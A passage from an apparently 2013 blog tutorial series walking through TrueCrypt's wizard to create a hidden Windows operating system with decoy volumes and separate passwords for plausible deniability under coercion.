you want, you can set up additional non-system encrypted volumes to be
mounted at boot up, but that is outside the scope of this article. </div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAEnTOFYUZAbBPWF6kXX3qAe9fYYubzUBjf2GFQXNeVuWXwCMHyPTsYzJybfTT317TMP4hzPEz4LBNSWLPA0Kxi4Q1mhuoFzSwovwZtcTF-TSyqZeckCBCkTo7zO8sGedgTYmqsARd71w/s1600/059.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAEnTOFYUZAbBPWF6kXX3qAe9fYYubzUBjf2GFQXNeVuWXwCMHyPTsYzJybfTT317TMP4hzPEz4LBNSWLPA0Kxi4Q1mhuoFzSwovwZtcTF-TSyqZeckCBCkTo7zO8sGedgTYmqsARd71w/s400/059.jpg" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~You can click Do not show this again here: </div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiokTyHAocrck4BvJvnvigw9_4DK0PfZyDePhkUN4pxZybBlFB82FUCwMuYY44UOFcjFC4V7EtidaoC12pmc8S_gZaqm537K_DAdwLOwrRaVFW6HWqaQPEG-ajZavzAOGPVHERkakrTAZ8/s1600/060.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiokTyHAocrck4BvJvnvigw9_4DK0PfZyDePhkUN4pxZybBlFB82FUCwMuYY44UOFcjFC4V7EtidaoC12pmc8S_gZaqm537K_DAdwLOwrRaVFW6HWqaQPEG-ajZavzAOGPVHERkakrTAZ8/s400/060.jpg" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
~But if you had clicked Show more information you would have seen this, which was shown earlier -- so not that big of a deal. </div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxW6RanzhZXpJOa7s7_ddiPn2xrDIFpUT6KxqV6Z6BXuURJEpZ9-E_O1GXUuEFIALOmjM8cQ2180ldgCHYQhmDpcPzQzCxAHwlV35naI3uPWMAzK9NjC3YQ3uUUgojkvmqq9knzImo-qk/s1600/061.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxW6RanzhZXpJOa7s7_ddiPn2xrDIFpUT6KxqV6Z6BXuURJEpZ9-E_O1GXUuEFIALOmjM8cQ2180ldgCHYQhmDpcPzQzCxAHwlV35naI3uPWMAzK9NjC3YQ3uUUgojkvmqq9knzImo-qk/s400/061.jpg" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~Alright,
let's test this baby! If you reboot, you should get the bootloader shown
below. If you type Password A, you get the decoy operating system on
Partition 1. If you type Password B, you will get the hidden operating
system on the inner volume of Partition 2! Don't worry, if you press
Escape it doesn't really bypass authentication as long as you have
encrypted the drive (which you just did). It would only work if you had a
TrueCrypt bootloader sitting on top of an unencrypted system, which is not the case here.</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNOqGnSyVL0ZVzJZXMiOLKC6BdcSIQZ66FLWfRiizvOlEggEGFJJkYLqR7ZTsZVtdihCjJeBDLotgIGWKoK5far1Z6HNq76iItI6fXuf_a7Sbd6dZRk0RJGPJCjq2oEGTBnU6DLr7JKQE/s1600/062.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNOqGnSyVL0ZVzJZXMiOLKC6BdcSIQZ66FLWfRiizvOlEggEGFJJkYLqR7ZTsZVtdihCjJeBDLotgIGWKoK5far1Z6HNq76iItI6fXuf_a7Sbd6dZRk0RJGPJCjq2oEGTBnU6DLr7JKQE/s400/062.jpg" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~If
instead of typing the password or Escape you press F8, you will get
some options which you will hopefully never need. Most of these options
are only there because this same bootloader gets copied to the rescue
disc and would be run from there. </div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9n1QRdEH9vQ4FuhFTyABBkOTklMklMbZfmWFX_uFRY5EPpVGquemxOjuJfF1OLqQqG0hg45PxcS1nI02uAgIMcPBCy4vx3WZLjDqcCxyjPeXFloC14ddcGYmlsgoALeCGexZBMdzsDFY/s1600/063.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9n1QRdEH9vQ4FuhFTyABBkOTklMklMbZfmWFX_uFRY5EPpVGquemxOjuJfF1OLqQqG0hg45PxcS1nI02uAgIMcPBCy4vx3WZLjDqcCxyjPeXFloC14ddcGYmlsgoALeCGexZBMdzsDFY/s400/063.jpg" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
~Awesome!
So you've set up your system! In Part
4 I will boot into a live CD just to prove out whether or not I can
see the encrypted data and show you some cool stuff, so stay tuned!<br />
<br />
Links to each section:<br />
<a href="http://breakstuffmajorly.blogspot.com/2013/09/plausible-deniability-of-hidden-os-part.html">Part 1</a> - (Un)boring intro with all the snazzy info<br />
<a href="http://breakstuffmajorly.blogspot.com/2013/09/plausible-deniability-of-hidden-os-part-2.html">Part 2</a> - Setup your second partition<br />
Part 3 - Setup your first partition (sounds backwards, I know) -- you are here<br />
Part 4 - Other cool stuff -- COMING SOON<br />
<br />
<span style="font-size: large;">Plausible deniability of a hidden OS - Part 2</span> (published 2013-09-06, updated 2013-09-12)<br />
This is Part 2 of a 4 part post on using TrueCrypt to create a hidden operating system.<br />
<br />
Links to each section:<br />
<a href="http://breakstuffmajorly.blogspot.com/2013/09/plausible-deniability-of-hidden-os-part.html" target="">Part 1</a> - (Un)boring intro with all the snazzy info<br />
Part 2 - Setup your second partition -- you are here<br />
<a href="http://breakstuffmajorly.blogspot.com/2013/09/plausible-deniability-of-hidden-os-part-3.html">Part 3</a> - Setup your first partition (sounds backwards, I know)<br />
Part 4 - Other cool stuff -- COMING SOON<br />
<br />
<br />
<span style="font-size: large;">Part 2 - Setup your second partition</span><br />
<br />
This
section guides you through setting up the outer and inner volumes on
Partition 2. Some of the images are a little too small to read but all
you have to do is click on them to enlarge. One other note: It can
sometimes get confusing on blog posts whether the paragraph of text
applies to the image above it, or the image below it. Well, in this case the paragraphs of text always apply to the image <i>below</i>, if there is one.<br />
<br />
Throughout this process you may want to refer back to this quick rundown of the passwords you will need to assign and their roles:<br />
<br />
-Password A: This is the password that you will use for the decoy operating system on Partition 1.<br />
-Password B: This is the password that you will use for the hidden operating system on the inner volume of Partition 2.<br />
-Password C: This is the password that you will use for the outer volume on Partition 2, which will contain decoy files (not the decoy operating system).<br />
<br />
Okay, let's get started.<br />
<br />
<br />
~~ First download and install TrueCrypt for Windows <a href="http://www.truecrypt.org/downloads" target="_blank">here</a>. Note: TrueCrypt can <a href="http://www.truecrypt.org/docs/?s=sys-encryption-supported-os" target="_blank">only create an encrypted operating system boot setup for Windows</a>. Mac and Linux are supported for encrypted volumes, but <b>not</b> an encrypted operating system. However, there are other options available for other operating systems, so hit up Google.<br />
<br />
~~ Next, you need to set up your partitioning to prepare for the encryption like this:<br />
<br />
<b>First partition</b>
= Your current Windows installation, which will later be moved to the
second partition and hidden. (As part of the wizard, TrueCrypt moves the
current installation of Windows to the inner volume of the second partition
and hides it there. It may be a good idea to start with a fresh install of Windows.)<br />
<b>Second partition</b> = At least 2.1 times larger than the first partition<br />
<br />
Here's how I set mine up (click the image to enlarge):<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHBDzveg-qOHW-akcipxgpAhaoKXCneSrI9ZcwrNV0_vY8vjzjmcY3tWoe8XWzUC5O2e0uGdHyV7XZ5FavjfdkFdhGmtMAsj4oXvc_hA6PghVZfhg-Y_jlCwO0CgPDFfzMLmOVxF1Oj2I/s1600/001.png" style="margin-left: auto; margin-right: auto;"><img border="0" height="41" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHBDzveg-qOHW-akcipxgpAhaoKXCneSrI9ZcwrNV0_vY8vjzjmcY3tWoe8XWzUC5O2e0uGdHyV7XZ5FavjfdkFdhGmtMAsj4oXvc_hA6PghVZfhg-Y_jlCwO0CgPDFfzMLmOVxF1Oj2I/s400/001.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">(click to enlarge)</td></tr>
</tbody></table>
<br />
<i>NOTE: You may do better finding a
partitioning scheme that doesn't potentially give away that you are
using a hidden partition. If someone coerces you into giving them access
to the decoy operating system and they see that the second partition is
2.1 times larger than the first partition, this could be a giveaway --
though it's still technically plausibly deniable. Try using a
partitioning scheme that makes the second partition more like 2.5 or 3
times larger. As long as it is at least 2.1 times larger, you are okay.</i><br />
<br />
While
we're on the topic of partitioning, if at some point near the beginning
of the encryption wizard you get the dialog shown below, then click Yes,
reboot and start over. Paging files on non-system partitions are a
no-go in an encrypted setup.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjldBMYrUxPviEHuru5936pra_UNjM9Bm8yRNqZptwTpC3ydgg5F5UAuTXPzmfKB7mrqSeng5-jYZkzPxYZwYSMdDRYStDLxYg1kZF3U4lcieRAFSTAou8gvIqvrS5gdGN6aNemztnM97A/s1600/000.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="353" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjldBMYrUxPviEHuru5936pra_UNjM9Bm8yRNqZptwTpC3ydgg5F5UAuTXPzmfKB7mrqSeng5-jYZkzPxYZwYSMdDRYStDLxYg1kZF3U4lcieRAFSTAou8gvIqvrS5gdGN6aNemztnM97A/s400/000.png" width="400" /></a></div>
<br />
Also,
in order to get your partitioning the way you want it, you may need to
shrink your system partition. If you have Windows 7, this is actually
pretty easy to do through Disk Management. Check Google. Can't remember
if you can shrink Vista, but who really cares, right? ;) If you get errors
when shrinking your system partition, there are some tricks you can do
to correct that, including running a defrag, etc. That's outside the
scope of this article, so please check Google. Oh, and shrinking XP
without system damage is next to impossible, though not completely.<br />
<br />
~~
Okay, so once you've got your partitioning in order, go ahead and open
TrueCrypt and choose System &gt; Create Hidden Operating System<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidDx5AWa8YDnWJhkN7560psbbLM7-QHy-54YsxVWCjWhmW0Nktn-0FLhvkh58aUkLOqUzLxyByMEiuUYoRAsKfVT8-dLRFZjkAc9Yg-uAjat8a7z5i0zPxyNh0NYUMFFh7z0PN4AEGkxU/s1600/002.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="346" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidDx5AWa8YDnWJhkN7560psbbLM7-QHy-54YsxVWCjWhmW0Nktn-0FLhvkh58aUkLOqUzLxyByMEiuUYoRAsKfVT8-dLRFZjkAc9Yg-uAjat8a7z5i0zPxyNh0NYUMFFh7z0PN4AEGkxU/s400/002.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~~ Read the happy little dialog about someone holding a gun to your head and then click OK:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAUnnB9bo2m-cYPtpncA0y40oAggYvhHQ_2BaGfW-rlYVVJVtK-Mixq7HvFDeuktgZgR0lWDb42ZqUUieHCQqJV2HmO1APowAJGL3GT_AGFjbxB3LsnBozB4fUY2jmr7lb07uRMAd_7OI/s1600/003.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="221" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAUnnB9bo2m-cYPtpncA0y40oAggYvhHQ_2BaGfW-rlYVVJVtK-Mixq7HvFDeuktgZgR0lWDb42ZqUUieHCQqJV2HmO1APowAJGL3GT_AGFjbxB3LsnBozB4fUY2jmr7lb07uRMAd_7OI/s400/003.png" width="400" /></a></div>
~~
Below is actually one of the most useful informational dialogs we will
see during the wizard and explains the anatomy pretty well! Read and
click Next of course...<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3EnLUgNwc85hJcQdLMxQb5Ci8nxnFq1qN3Sz965GTMHo1dR2DIBkrslzfiH-arVAzcR644g4UDBMqWxiJvfjCHAQJbEHvzPLiSo004M0Rg7n1Z9LLV7AYyL2AnafYhMYJi58r6w4puas/s1600/004.png" style="margin-left: auto; margin-right: auto;"><img border="0" height="251" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3EnLUgNwc85hJcQdLMxQb5Ci8nxnFq1qN3Sz965GTMHo1dR2DIBkrslzfiH-arVAzcR644g4UDBMqWxiJvfjCHAQJbEHvzPLiSo004M0Rg7n1Z9LLV7AYyL2AnafYhMYJi58r6w4puas/s400/004.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">(click to enlarge)</td></tr>
</tbody></table>
~~ So basically this next dialog is saying that your
current installation of Windows is going to be moved to the hidden
volume on Partition 2 and that you will have to reinstall Windows from
scratch onto Partition 1. If you have Windows installation media, click
Yes.<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiec_aJFPXiwRy_2hvshPpkM4ezg25HJ4PpFzSew97vZJYCWrVEEWcvnUQEq-gmNrYjNOTCh9r_Fuoq2oQCQce_LeevbrfBa1GztsKma5hS5LNiQRPukSrgPycdWMxolD12pQi4U58PRFw/s1600/005.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiec_aJFPXiwRy_2hvshPpkM4ezg25HJ4PpFzSew97vZJYCWrVEEWcvnUQEq-gmNrYjNOTCh9r_Fuoq2oQCQce_LeevbrfBa1GztsKma5hS5LNiQRPukSrgPycdWMxolD12pQi4U58PRFw/s400/005.png" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~~
The next dialog is mainly telling you that whenever you are booted into
your hidden operating system, you will not be able to write to any
unencrypted filesystems that you may happen to have. This is a good
thing, because if you did write to an unencrypted file system, later
forensics could be performed on that file system to determine
whether it was mounted from an operating system other than the decoy
operating system. This could give away your hidden operating system.</div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1EGKrB6zSGEKO1fVudxs1uLoyVW7kAOBrS8rhBVvUbfRZbwKLKXkfXsQgD_up-PHnaFYs8KDmddZpzHz2rUnizJTzrxvJ7BkQtZwlIMLM3zWJKl6SdSEO772qvskfJTjjJ5GAJX9QZfQ/s1600/006.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1EGKrB6zSGEKO1fVudxs1uLoyVW7kAOBrS8rhBVvUbfRZbwKLKXkfXsQgD_up-PHnaFYs8KDmddZpzHz2rUnizJTzrxvJ7BkQtZwlIMLM3zWJKl6SdSEO772qvskfJTjjJ5GAJX9QZfQ/s1600/006.png" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~~
Here you need to choose Single-boot even though we are going to set up 2
separate operating systems. Setting up Multi-boot is actually a whole
different thing and is outside the scope of this article:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaqRXMPIAhx-EdGrke-ghZfFbnSsKEhD11LBHP1Ntq7qt1tRjUvmM5ijOnURiTdrrPNq9EFq2TngFw_PB16s2lBL4hs7Hsv7tv6tUgGNHpS-z7b14-H-ySEqYtKewLsEhORgOoPpGP9CA/s1600/007.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="241" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaqRXMPIAhx-EdGrke-ghZfFbnSsKEhD11LBHP1Ntq7qt1tRjUvmM5ijOnURiTdrrPNq9EFq2TngFw_PB16s2lBL4hs7Hsv7tv6tUgGNHpS-z7b14-H-ySEqYtKewLsEhORgOoPpGP9CA/s400/007.png" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~~
Make sure Windows is activated before you proceed. You don't want to be
activating a hidden operating system with Microsoft's servers when it
is supposed to be invisible. Don't blow your cover!</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXYA_gpZiM2YoSM_mGFv8SagTfi0uDaxa5GNodVKsWnmIGKQgS9e1wIGZbWAvckptRPL0yUXEjlLTLxK5fYKKCxciBIkRbMfcMlqA2Mu6aV3YA0YedI9t86_e4e806Qu0n_0_GdKo8Hj4/s1600/008.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="302" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXYA_gpZiM2YoSM_mGFv8SagTfi0uDaxa5GNodVKsWnmIGKQgS9e1wIGZbWAvckptRPL0yUXEjlLTLxK5fYKKCxciBIkRbMfcMlqA2Mu6aV3YA0YedI9t86_e4e806Qu0n_0_GdKo8Hj4/s400/008.png" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~~
This dialog may seem a little confusing but take a look at <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEja9MGuX1z0H0bhEd7tzdbcMSZl7T1t0st7k5o-EhPu1cT1g5Fo4TXBT12kk2UGO-91s2TzQKK86AYPSX_FoCINCF4Ti-M72pADYCS1KC83QRhLCEdx8K_XyZYJWR1t8sSzRjT5Uqg-lts/s1600/TC_boot2.png" target="_blank">the chart</a>
shown in <a href="http://breakstuffmajorly.blogspot.com/2013/09/plausible-deniability-of-hidden-os-part.html" target="_blank">Part 1</a> and it should make a lot more sense. On most systems, the wording "first
partition behind the system partition" will simply translate to mean your second partition.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSa48uf2JkfVr1onnyiQLtCoYw9rV3bexUDzlcArzPkyCVPJ08rQnTU68decdN-oxheYN6R6LcPFEJWGAdWwpG0LGe0fsDAV8nCswyL0S7iz5yxY-tyk-wqJDb8YUl-CdZ5hSNU2gCUYE/s1600/009.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="242" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSa48uf2JkfVr1onnyiQLtCoYw9rV3bexUDzlcArzPkyCVPJ08rQnTU68decdN-oxheYN6R6LcPFEJWGAdWwpG0LGe0fsDAV8nCswyL0S7iz5yxY-tyk-wqJDb8YUl-CdZ5hSNU2gCUYE/s400/009.png" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~~ Going with the defaults should be fine here. But if you want to geek out on different algorithms, go for it!</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmfuDNNdo1iqAJSCXKjC6hOYG-N694XhsPqEfvDr54KaBAE5IT5BBER6XVs8pkyEsXFaXQuaN6gajpb4NGhhTsPNlK6J-5NcfAvYWWl63IuCjHB49DZLl_TRcNmE4blKBU_In8xh9robA/s1600/010.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="242" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmfuDNNdo1iqAJSCXKjC6hOYG-N694XhsPqEfvDr54KaBAE5IT5BBER6XVs8pkyEsXFaXQuaN6gajpb4NGhhTsPNlK6J-5NcfAvYWWl63IuCjHB49DZLl_TRcNmE4blKBU_In8xh9robA/s400/010.png" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~~ Double check that the partitioning looks right:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-NiwwNChj9u_cEWcAvGW583Xyx-b2jTADjGh7fgp9v0W0nDPliU0ujp0FDeO7zHepxiwiJkndLgv_A3FUNJLKe3dyl-G6HW6X81x32DqH9_3sHLVUAfb-DFZah6Iq45EfjrOw_Ar0610/s1600/011.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="242" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-NiwwNChj9u_cEWcAvGW583Xyx-b2jTADjGh7fgp9v0W0nDPliU0ujp0FDeO7zHepxiwiJkndLgv_A3FUNJLKe3dyl-G6HW6X81x32DqH9_3sHLVUAfb-DFZah6Iq45EfjrOw_Ar0610/s400/011.png" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~~ Here you will create Password C. If you can't remember which is Password C, check the big <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEja9MGuX1z0H0bhEd7tzdbcMSZl7T1t0st7k5o-EhPu1cT1g5Fo4TXBT12kk2UGO-91s2TzQKK86AYPSX_FoCINCF4Ti-M72pADYCS1KC83QRhLCEdx8K_XyZYJWR1t8sSzRjT5Uqg-lts/s1600/TC_boot2.png" target="_blank">diagram</a> in <a href="http://breakstuffmajorly.blogspot.com/2013/09/plausible-deniability-of-hidden-os-part.html" target="_blank">Part 1</a>.</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOs16lRISMyxGyjSqxhHXRs4OCUaf5No-0mifJD2QVtkxAbdbD78FyUJ4-SoXdG3FCdghRpmCSL9gO_BzXk47uKnrqo7sQ7obvKy8HFNcDbNNRoVC_veGTfyKti8onW6FBNp8ZIRd3cUM/s1600/012.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="245" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOs16lRISMyxGyjSqxhHXRs4OCUaf5No-0mifJD2QVtkxAbdbD78FyUJ4-SoXdG3FCdghRpmCSL9gO_BzXk47uKnrqo7sQ7obvKy8HFNcDbNNRoVC_veGTfyKti8onW6FBNp8ZIRd3cUM/s400/012.png" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~~
Do you intend to store files larger than 4 GB on the outer volume of
the second partition? (Probably not. Remember, this is the volume
containing decoy flat files.) </div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlQ9OJKsvUs__QOk-X836Uu6JjkkXhwr0BIwogOZz-ToKwG-EYogS1T5EAXbdTAokHJKoNkYcjJGjArkboSu1IyfRu2galjBE_iF1noBjSIiWmVit8cnJVwS9uVTA05ktNFEXmsNt8e6c/s1600/013.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="242" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlQ9OJKsvUs__QOk-X836Uu6JjkkXhwr0BIwogOZz-ToKwG-EYogS1T5EAXbdTAokHJKoNkYcjJGjArkboSu1IyfRu2galjBE_iF1noBjSIiWmVit8cnJVwS9uVTA05ktNFEXmsNt8e6c/s400/013.png" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~~ I would go with the defaults here: </div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJsRXQ3AwoNl3xkqsweg3ST2ZQeylDgk8P8eym5ZY9MKqrjhPWBlwuRs4zMPxuIw1N_mtzDY8bc_1tXdoztbKzQ0doPBpF6yJec-cr63evjoMSl1TSsv9ICIqJag6rVwlh9Be0GNrxs6I/s1600/014.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="242" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJsRXQ3AwoNl3xkqsweg3ST2ZQeylDgk8P8eym5ZY9MKqrjhPWBlwuRs4zMPxuIw1N_mtzDY8bc_1tXdoztbKzQ0doPBpF6yJec-cr63evjoMSl1TSsv9ICIqJag6rVwlh9Be0GNrxs6I/s400/014.png" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~~ Just double checking! Are you sure you don't have anything stored on the second partition that you don't want deleted?! </div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKPzgwMvinGmGYX8AAKl8_DcfLLQm-vN8tE6QKr4pnpFPIhoDUAjnVgLrJbQVtMRUk_e9IKDJyCLGWt5NOShFw0aHFLDzuRHhkWk9tQG-hD2jG1JI4P18bogWVXMZwoBivw3w-ls3BRN4/s1600/015.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="185" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKPzgwMvinGmGYX8AAKl8_DcfLLQm-vN8tE6QKr4pnpFPIhoDUAjnVgLrJbQVtMRUk_e9IKDJyCLGWt5NOShFw0aHFLDzuRHhkWk9tQG-hD2jG1JI4P18bogWVXMZwoBivw3w-ls3BRN4/s400/015.png" width="400" /></a></div>
<br />
~~ This may take a while... <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivjBqSSCiLhp9B4Lrs1fkeIpF2qMrqRsQTaBq9w6QiHVRJdFWJWPO_STXy3abG4ORHMrdlGNlS078G97lb9z4HRbfYrcTjUqIOqj1SKv8lcuzJPg9bG18A2tTCIjxjrSK2cvOz0HrDbRk/s1600/016.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="62" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivjBqSSCiLhp9B4Lrs1fkeIpF2qMrqRsQTaBq9w6QiHVRJdFWJWPO_STXy3abG4ORHMrdlGNlS078G97lb9z4HRbfYrcTjUqIOqj1SKv8lcuzJPg9bG18A2tTCIjxjrSK2cvOz0HrDbRk/s320/016.png" width="320" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~~
So if you are coerced into giving up Password A for the decoy operating
system installed on Partition 1, an adversary may notice Partition 2
and plausibly deduce that it contains encrypted data. Then they may
force you to give them Password C. Not to fear, however. Password C only
gives them access to the outer volume of Partition 2, which will contain
fake data in the form of flat files which are only a decoy. <b>It's now time for you to go ahead and create some fake files and copy them over to the outer volume on Partition 2</b>.
This is kind of funny. Um. Okay. How about a file that has a fake plan
of attack? Or maybe a list of bogus secret contacts? Of
course, keep in mind that your adversaries have Google, too, and if they
read this blog post then they may be looking for these, lol. So be
creative. Go on...Create some fake files already!</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Oh,
you may be wondering, "If they see a second partition and coerce me into
revealing the password to the outer volume, can't they accuse me of
having an inner volume, too? Won't they know I have a hidden operating
system?" Good thinking. They can certainly try to guess that this is the
case but you will be able to <b>plausibly deny</b> it. The decoy OS
can't be plausibly denied because of the password prompt at boot (unless
you removed it) and because most people have an operating system on
their computer, of course. The outer volume on the second partition
can't quite be plausibly denied because it doesn't make a lot of
